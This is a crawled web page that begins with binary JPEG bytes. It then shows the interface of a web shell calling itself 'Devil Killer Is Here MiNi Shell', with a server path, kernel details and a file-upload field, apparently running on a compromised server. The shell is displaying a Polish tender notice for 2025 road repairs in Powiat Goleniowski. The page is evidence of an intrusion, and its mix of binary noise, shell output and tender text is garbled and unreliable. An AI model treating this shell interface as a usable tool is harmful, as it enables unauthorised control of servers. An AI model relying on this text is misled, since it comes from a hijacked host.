JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250124/0006170401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remonty cząstkowe dróg na terenie Powiatu Goleniowskiego <br/>w 2025 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Goleniowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811684120</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dworcowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Goleniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wrip@powiat-goleniowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat-goleniowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remonty cząstkowe dróg na terenie Powiatu Goleniowskiego <br/>w 2025 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ab99dbd5-827f-4051-b8f2-c57b1c3c7d56</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00061704</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00017525/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Remonty cząstkowe dróg na terenie Powiatu Goleniowskiego w 2025 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/sp_goleniow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu komunikacja między Zamawiającym a wykonawcą odbywa się przy<br/>użyciu platformy zakupowej https://platformazakupowa.pl/sp_goleniow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Osobą uprawnioną do kontaktu z<br/>Wykonawcami jest:<br/>a) Bogusław Zaborowski<br/>b) Dominik Okunek<br/>c) Agata Wachowiak<br/>2. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem<br/>https://platformazakupowa.pl/sp_goleniow<br/>3. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl<br/>Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie<br/>zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego<br/>wykonawcy.<br/>4. Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIE PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące<br/>specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za<br/>pośrednictwem platformazakupowa.pl tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 4 GB Ram, procesor Intel i3 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 10, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Microsoft Edge,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>5. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym<br/>postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>6. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/sp_goleniow</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">zgodnie z zapisami w części II SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WDI.272.5.2025.DO</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 – Obwód Drogowy w Goleniowie<br/>1.1. Przedmiotem zamówienia jest wykonanie remontów cząstkowych nawierzchni asfaltowej na wybieranych przez<br/>Zamawiającego w toku realizacji przedmiotu zamówienia odcinkach dróg powiatowych na terenie Obwodu Drogowego w<br/>Goleniowie w 2025 roku – zgodnie z wykazem dróg powiatowych, który stanowi (załącznik nr 6a do SWZ).<br/>1.2.Szacunkowy zakres remontów cząstkowych obejmuje mechaniczne wbudowanie grysu bazaltowego otoczonego<br/>kationową emulsją asfaltową klasy K1-65 ok. 600 Mg stosownie do bieżących potrzeb Zamawiającego ustalanych, przez<br/>Zamawiającego (sukcesywnie) podczas wspólnej weryfikacji dróg powiatowych z Wykonawcą.<br/>1.3.Wskazana w pkt 1.2) ilość prac ma charakter szacunkowy zaś zakres rzeczywiście zrealizowanych robót może być<br/>mniejszy niż tam wskazany, lub większy (w tym wypadku jednak nie może być większy niż skutkujący przekroczeniem przez<br/>wynagrodzenie Wykonawcy kwoty przeznaczonej przez Zamawiającego na wykonanie przedmiotu zamówienia).<br/>Wykonawcy przysługuje wynagrodzenie za faktycznie wykonany zakres zleconych robót.<br/>1.4. Zamawiający wymaga od Wykonawcy udzielenia minimum 12-miesięcznej gwarancji na wykonany przez siebie remont.<br/>1.5. Do obowiązków Wykonawcy należy:<br/>a) wykonywanie umowy zgodnie z jej treścią oraz starannością wynikającą z zawodowego charakteru działalności<br/>Wykonawcy;<br/>b) oznakowanie miejsca robót zgodnie z wykonanym przez Wykonawcę i zatwierdzonym zgodnie z obowiązującymi<br/>przepisami projektem tymczasowej organizacji ruchu; a także zgodnie z przepisami ustawy Prawo o ruchu drogowym oraz<br/>przepisami aktów wykonawczych; droga powinna być oznaczona w czasie wykonywania robót oraz po ich zakończeniu<br/>przez niezbędny do ustania zagrożenia (zmniejszona przyczepność pojazdów, materiał wydobywający się spod kół<br/>pojazdów itd.);<br/>c) uporządkowanie drogi po wykonanym remoncie;<br/>d) zgłoszenie zakończenia robót związanych z remontem cząstkowym;<br/>e) zabezpieczenie stałego nadzoru kierownika budowy w czasie remontu;<br/>f) zabezpieczenie terenu robót pod względem BHP, ppoż. i bezpieczeństwa w komunikacji lądowej oraz miejsca<br/>składowania materiałów – zgodnie z obowiązującymi przepisami;<br/>g) wykonanie przedmiotu umowy z materiałów własnych;<br/>h) zawarcie odpowiednich umów ubezpieczenia od odpowiedzialności cywilnej z tytułu szkód jakie mogą zaistnieć w związku<br/>z prowadzeniem remontów cząstkowych na drogach powiatowych;<br/>1.6. Zamawiający zastrzega sobie prawo wyposażenia pojazdów remontowanych w urządzenia GPS monitorujących trasę<br/>remontów.<br/>1.7. Szczegółowy opis oraz sposób realizacji zamówienia zawiera Specyfikacja techniczna wykonania i odbioru robót,<br/>stanowiący Załącznik nr 10 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 – Obwód Drogowy w Nowogardzie 1.1. Przedmiotem zamówienia jest wykonanie remontów cząstkowych nawierzchni asfaltowych na wybieranych przez<br/>Zamawiającego w toku realizacji przedmiotu zamówienia odcinkach dróg powiatowych na terenie Obwodu Drogowego w<br/>Nowogardzie w 2025 roku – zgodnie z wykazem dróg powiatowych, który stanowi (załącznik nr 6b do SWZ).<br/>1.2.Szacunkowy zakres remontów cząstkowych obejmuje mechaniczne wbudowanie grysu bazaltowego otoczonego<br/>kationową emulsją asfaltową klasy K1-65 ok. 600 Mg stosownie do bieżących potrzeb Zamawiającego ustalanych, przez<br/>Zamawiającego (sukcesywnie) podczas wspólnej weryfikacji dróg powiatowych z Wykonawcą.<br/>1.3. Wskazana w pkt 1.2. ilość prac ma charakter szacunkowy zaś zakres rzeczywiście zrealizowanych robót może być<br/>mniejszy niż tam wskazany, lub większy (w tym wypadku jednak nie może być większy niż skutkujący przekroczeniem przez<br/>wynagrodzenie Wykonawcy kwoty przeznaczonej przez Zamawiającego na wykonanie przedmiotu zamówienia).<br/>Wykonawcy przysługuje wynagrodzenie za faktycznie wykonany zakres zleconych robót.<br/>1.4. Zamawiający wymaga od Wykonawcy udzielenia minimum 12-miesięcznej gwarancji na wykonany przez siebie remont.<br/>1.5. Do obowiązków Wykonawcy należy:<br/>a) wykonywanie umowy zgodnie z jej treścią oraz starannością wynikającą z zawodowego charakteru działalności<br/>Wykonawcy;<br/>b) oznakowanie miejsca robót zgodnie z wykonanym przez Wykonawcę i zatwierdzonym zgodnie z obowiązującymi<br/>przepisami projektem tymczasowej organizacji ruchu; a także zgodnie z przepisami ustawy Prawo o ruchu drogowym oraz<br/>przepisami aktów wykonawczych; droga powinna być oznaczona w czasie wykonywania robót oraz po ich zakończeniu<br/>przez niezbędny do ustania zagrożenia (zmniejszona przyczepność pojazdów, materiał wydobywający się spod kół<br/>pojazdów itd.);<br/>c) uporządkowanie drogi po wykonanym remoncie;<br/>d) zgłoszenie zakończenia robót związanych z remontem cząstkowym;<br/>e) zabezpieczenie stałego nadzoru kierownika budowy w czasie remontu;<br/>f) zabezpieczenie terenu robót pod względem BHP, ppoż. i bezpieczeństwa w komunikacji lądowej oraz miejsca<br/>składowania materiałów – zgodnie z obowiązującymi przepisami;<br/>g) wykonanie przedmiotu umowy z materiałów własnych,<br/>h) zawarcie odpowiednich umów ubezpieczenia od odpowiedzialności cywilnej z tytułu szkód jakie mogą zaistnieć w związku<br/>z prowadzeniem remontów cząstkowych na drogach powiatowych;<br/>1.6. Zamawiający zastrzega sobie prawo wyposażenia pojazdów remontowanych w urządzenia GPS monitorujących trasę<br/>remontów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3 – Obwód Drogowy w Maszewie<br/>1.1. Przedmiotem zamówienia jest wykonanie remontów cząstkowych nawierzchni asfaltowych na wybieranych przez<br/>Zamawiającego w toku realizacji przedmiotu zamówienia odcinkach dróg powiatowych na terenie Obwodu Drogowego w<br/>Maszewie w 2025 roku – zgodnie z wykazem dróg powiatowych, który stanowi (załącznik nr 6c do SWZ).<br/>1.2.Szacunkowy zakres remontów cząstkowych obejmuje mechaniczne wbudowanie grysu bazaltowego otoczonego<br/>kationową emulsją asfaltową klasy K1-65 ok. 600 Mg stosownie do bieżących potrzeb Zamawiającego ustalanych, przez<br/>Zamawiającego (sukcesywnie) podczas wspólnej weryfikacji dróg powiatowych z Wykonawcą.<br/>1.3 Wskazana w pkt 1.2. ilość prac ma charakter szacunkowy zaś zakres rzeczywiście zrealizowanych robót może być<br/>mniejszy niż tam wskazany, lub większy (w tym wypadku jednak nie może być większy niż skutkujący przekroczeniem przez<br/>wynagrodzenie Wykonawcy kwoty przeznaczonej przez Zamawiającego na wykonanie przedmiotu zamówienia).<br/>Wykonawcy przysługuje wynagrodzenie za faktycznie wykonany zakres zleconych robót.<br/>1.4. Zamawiający wymaga od Wykonawcy udzielenia minimum 12-miesięcznej gwarancji na wykonany przez siebie remont.<br/>1.5. Do obowiązków Wykonawcy należy:<br/>a) wykonywanie umowy zgodnie z jej treścią oraz starannością wynikającą z zawodowego charakteru działalności<br/>Wykonawcy;<br/>b) oznakowanie miejsca robót zgodnie z wykonanym przez Wykonawcę i zatwierdzonym zgodnie z obowiązującymi<br/>przepisami projektem tymczasowej organizacji ruchu; a także zgodnie z przepisami ustawy Prawo o ruchu drogowym oraz<br/>przepisami aktów wykonawczych; droga powinna być oznaczona w czasie wykonywania robót oraz po ich zakończeniu<br/>przez niezbędny do ustania zagrożenia (zmniejszona przyczepność pojazdów, materiał wydobywający się spod kół<br/>pojazdów itd.);<br/>c) uporządkowanie drogi po wykonanym remoncie;<br/>d) zgłoszenie zakończenia robót związanych z remontem cząstkowym;<br/>e) zabezpieczenie stałego nadzoru kierownika budowy w czasie remontu;<br/>f) zabezpieczenie terenu robót pod względem BHP, ppoż. i bezpieczeństwa w komunikacji lądowej oraz miejsca<br/>składowania materiałów – zgodnie z obowiązującymi przepisami;<br/>g) wykonanie przedmiotu umowy z materiałów własnych;<br/>h) zawarcie odpowiednich umów ubezpieczenia od odpowiedzialności cywilnej z tytułu szkód jakie mogą zaistnieć w związku<br/>z prowadzeniem remontów cząstkowych na drogach powiatowych;<br/>1.6. Zamawiający zastrzega sobie prawo wyposażenia pojazdów remontowanych w urządzenia GPS monitorujących trasę<br/>remontów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> 